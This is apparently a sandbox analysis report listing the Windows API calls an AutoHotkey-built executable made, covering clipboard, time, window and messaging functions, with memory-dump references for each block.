      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00472E30: GetCurrentProcess.KERNEL32(00000000,?,004282EF), ref: 00472E3E
      • Part of subcall function 00472E30: IsWow64Process.KERNEL32(00000000,?,004282EF), ref: 00472E45
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0044F970: SendMessageTimeoutA.USER32(00000000,000000F0,00000000,00000000,00000002,000007D0,?), ref: 0044F9EE
      • Part of subcall function 0044F970: GetWindowThreadProcessId.USER32(?,00000000), ref: 0044FA17
      • Part of subcall function 0044F970: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 0044FA46
      • Part of subcall function 0044F970: SetActiveWindow.USER32(?), ref: 0044FA61
      • Part of subcall function 0044F970: GetWindowRect.USER32(00000000,?), ref: 0044FA6D
      • Part of subcall function 0044F970: PostMessageA.USER32(00000000,00000201,00000001,?), ref: 0044FABB
      • Part of subcall function 0044F970: PostMessageA.USER32(00000000,00000202,00000000,?), ref: 0044FAC6
      • Part of subcall function 0044F970: AttachThreadInput.USER32(00000E10,?,00000000), ref: 0044FAD9
      • Part of subcall function 0044F970: EnableWindow.USER32(00000000,00000001), ref: 0044FAE4
      • Part of subcall function 0044F970: ShowWindow.USER32(00000000,00000004), ref: 0044FB2A
      • Part of subcall function 0044F970: ShowWindow.USER32(00000000,00000000), ref: 0044FB35
      • Part of subcall function 0044F970: GetWindowLongA.USER32(00000000,00000000), ref: 0044FB66
      • Part of subcall function 0044F970: SetLastError.KERNEL32(00000000), ref: 0044FBCA
      • Part of subcall function 0044F970: SetWindowLongA.USER32(00000000,?,00000000), ref: 0044FBD7
      • Part of subcall function 0044F970: GetLastError.KERNEL32 ref: 0044FBE1
      • Part of subcall function 0044F970: GetWindowLongA.USER32(00000000,?), ref: 0044FBF1
      • Part of subcall function 0044F970: InvalidateRect.USER32(00000000,00000000,00000001), ref: 0044FC04
      • Part of subcall function 0044F970: SendMessageTimeoutA.USER32(?,0000014F,00000000,00000000,00000002,000007D0,?), ref: 0044FC48
      • Part of subcall function 0044F970: PostMessageA.USER32(?,00000100,?,?), ref: 0044FCCC
      • Part of subcall function 0044F970: PostMessageA.USER32(?,00000101,?,?), ref: 0044FCFA
      • Part of subcall function 0044F970: GetClassNameA.USER32(?,?,00000020), ref: 0044FD14
      • Part of subcall function 0044F970: SendMessageTimeoutA.USER32(?,00000180,00000000,7619B40E,00000002,000007D0,?), ref: 0044FD65
      • Part of subcall function 0044F970: GetClassNameA.USER32(?,?,00000020), ref: 0044FDB2
      • Part of subcall function 0044F970: SendMessageTimeoutA.USER32(?,00000182,-00000001,00000000,00000002,000007D0,?), ref: 0044FE03
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0042FAE0: _strncpy.LIBCMT ref: 0042FB63
      • Part of subcall function 0042FAE0: IsWindow.USER32(?), ref: 0042FCA9
      • Part of subcall function 0042FAE0: IsWindowVisible.USER32(?), ref: 0042FCC4
      • Part of subcall function 0042FAE0: ShowWindow.USER32(?,00000004), ref: 0042FCD4
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000402,?,00000000), ref: 0042FD93
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,0000000C,00000000,?), ref: 0042FDAC
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,0000000C,00000000,?), ref: 0042FDC1
      • Part of subcall function 0042FAE0: SetWindowTextA.USER32(?,?), ref: 0042FDD3
      • Part of subcall function 0042FAE0: DestroyWindow.USER32(?), ref: 0042FDF3
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE07
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE11
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE1B
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE2A
      • Part of subcall function 0042FAE0: DestroyCursor.USER32(?), ref: 0042FE2E
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(0000012C,00000060,00000060), ref: 0042FEED
      • Part of subcall function 0042FAE0: _strncpy.LIBCMT ref: 0042FFFE
      • Part of subcall function 0042FAE0: CreateSolidBrush.GDI32(00000000), ref: 0043008C
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 004301F5
      • Part of subcall function 0042FAE0: __Stoull.NTSTC_LIBCMT ref: 0043024D
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0043028D
      • Part of subcall function 0042FAE0: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00430338
      • Part of subcall function 0042FAE0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00430347
      • Part of subcall function 0042FAE0: GetStockObject.GDI32(00000011), ref: 00430353
      • Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,00000000), ref: 0043035F
      • Part of subcall function 0042FAE0: GetTextFaceA.GDI32(00000000,00000040,?), ref: 00430377
      • Part of subcall function 0042FAE0: GetTextMetricsA.GDI32(00000000,?), ref: 00430386
      • Part of subcall function 0042FAE0: GetIconInfo.USER32(00000000,?), ref: 0043045E
      • Part of subcall function 0042FAE0: GetObjectA.GDI32(00000000,00000018,?), ref: 00430486
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0043055E
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 00430568
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(0000012C,00000060,00000060), ref: 00430581
      • Part of subcall function 0042FAE0: SetRect.USER32(?,00000000,00000000,?,?), ref: 004305B7
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430608
      • Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0043063A
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430660
      • Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00430699
      • Part of subcall function 0042FAE0: SelectObject.GDI32(?,?), ref: 004306AF
      • Part of subcall function 0042FAE0: DrawTextA.USER32(?,?,000000FF,?,00000450), ref: 004306F8
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(?,00000008,00000048), ref: 00430751
      • Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,?,?), ref: 0043075A
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430798
      • Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,?,?), ref: 004307A1
      • Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,?), ref: 004307F5
      • Part of subcall function 0042FAE0: DrawTextA.USER32(00000000,?,000000FF,?,00000410), ref: 00430837
      • Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,?), ref: 00430856
      • Part of subcall function 0042FAE0: DeleteDC.GDI32(00000000), ref: 0043085D
      • Part of subcall function 0042FAE0: AdjustWindowRectEx.USER32(?,?,00000000,00000008), ref: 004308B6
      • Part of subcall function 0042FAE0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004308E6
      • Part of subcall function 0042FAE0: CreateWindowExA.USER32(?,AutoHotkey2,00000000,?,80000000,00000008,?,?,00000000,00000000,00400000,00000000), ref: 004309AF
      • Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000080,00000000,00000000), ref: 00430A00
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00430A15
      • Part of subcall function 0042FAE0: GetClientRect.USER32(?,?), ref: 00430A20
      • Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000000,static,?,00000000,?,?,?,?,?,00000000,00400000,00000000), ref: 00430A7A
      • Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00430A94
      • Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000200,msctls_progress32,00000000,50000001,?,?,?,?,?,00000000,00000000,00000000), ref: 00430AD9
      • Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000406,?,?), ref: 00430B36
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000409,00000000,?), ref: 00430B5C
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00002001,00000000,?), ref: 00430B74
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000402,?,00000000), ref: 00430B8D
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00430B9C
      • Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000000,static,?,00000000,?,?,?,?,?,00000000,00400000,00000000), ref: 00430BE5
      • Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00430C03
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0042FAE0: _strncpy.LIBCMT ref: 0042FB63
      • Part of subcall function 0042FAE0: IsWindow.USER32(?), ref: 0042FCA9
      • Part of subcall function 0042FAE0: IsWindowVisible.USER32(?), ref: 0042FCC4
      • Part of subcall function 0042FAE0: ShowWindow.USER32(?,00000004), ref: 0042FCD4
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000402,?,00000000), ref: 0042FD93
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,0000000C,00000000,?), ref: 0042FDAC
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,0000000C,00000000,?), ref: 0042FDC1
      • Part of subcall function 0042FAE0: SetWindowTextA.USER32(?,?), ref: 0042FDD3
      • Part of subcall function 0042FAE0: DestroyWindow.USER32(?), ref: 0042FDF3
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE07
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE11
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE1B
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE2A
      • Part of subcall function 0042FAE0: DestroyCursor.USER32(?), ref: 0042FE2E
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(0000012C,00000060,00000060), ref: 0042FEED
      • Part of subcall function 0042FAE0: _strncpy.LIBCMT ref: 0042FFFE
      • Part of subcall function 0042FAE0: CreateSolidBrush.GDI32(00000000), ref: 0043008C
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 004301F5
      • Part of subcall function 0042FAE0: __Stoull.NTSTC_LIBCMT ref: 0043024D
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0043028D
      • Part of subcall function 0042FAE0: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00430338
      • Part of subcall function 0042FAE0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00430347
      • Part of subcall function 0042FAE0: GetStockObject.GDI32(00000011), ref: 00430353
      • Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,00000000), ref: 0043035F
      • Part of subcall function 0042FAE0: GetTextFaceA.GDI32(00000000,00000040,?), ref: 00430377
      • Part of subcall function 0042FAE0: GetTextMetricsA.GDI32(00000000,?), ref: 00430386
      • Part of subcall function 0042FAE0: GetIconInfo.USER32(00000000,?), ref: 0043045E
      • Part of subcall function 0042FAE0: GetObjectA.GDI32(00000000,00000018,?), ref: 00430486
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0043055E
      • Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 00430568
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(0000012C,00000060,00000060), ref: 00430581
      • Part of subcall function 0042FAE0: SetRect.USER32(?,00000000,00000000,?,?), ref: 004305B7
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430608
      • Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0043063A
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430660
      • Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00430699
      • Part of subcall function 0042FAE0: SelectObject.GDI32(?,?), ref: 004306AF
      • Part of subcall function 0042FAE0: DrawTextA.USER32(?,?,000000FF,?,00000450), ref: 004306F8
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(?,00000008,00000048), ref: 00430751
      • Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,?,?), ref: 0043075A
      • Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430798
      • Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,?,?), ref: 004307A1
      • Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,?), ref: 004307F5
      • Part of subcall function 0042FAE0: DrawTextA.USER32(00000000,?,000000FF,?,00000410), ref: 00430837
      • Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,?), ref: 00430856
      • Part of subcall function 0042FAE0: DeleteDC.GDI32(00000000), ref: 0043085D
      • Part of subcall function 0042FAE0: AdjustWindowRectEx.USER32(?,?,00000000,00000008), ref: 004308B6
      • Part of subcall function 0042FAE0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004308E6
      • Part of subcall function 0042FAE0: CreateWindowExA.USER32(?,AutoHotkey2,00000000,?,80000000,00000008,?,?,00000000,00000000,00400000,00000000), ref: 004309AF
      • Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000080,00000000,00000000), ref: 00430A00
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00430A15
      • Part of subcall function 0042FAE0: GetClientRect.USER32(?,?), ref: 00430A20
      • Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000000,static,?,00000000,?,?,?,?,?,00000000,00400000,00000000), ref: 00430A7A
      • Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00430A94
      • Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000200,msctls_progress32,00000000,50000001,?,?,?,?,?,00000000,00000000,00000000), ref: 00430AD9
      • Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000406,?,?), ref: 00430B36
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000409,00000000,?), ref: 00430B5C
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00002001,00000000,?), ref: 00430B74
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000402,?,00000000), ref: 00430B8D
      • Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00430B9C
      • Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000000,static,?,00000000,?,?,?,?,?,00000000,00400000,00000000), ref: 00430BE5
      • Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00430C03
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00435750: GetWindowLongA.USER32(00000000,000000EC), ref: 004357E2
      • Part of subcall function 00435750: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0043582F
      • Part of subcall function 00435750: SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 00435847
      • Part of subcall function 00435750: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0043585F
      • Part of subcall function 00435750: GetWindowLongA.USER32(00000000,000000EC), ref: 0043586D
      • Part of subcall function 00435750: SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 004358A0
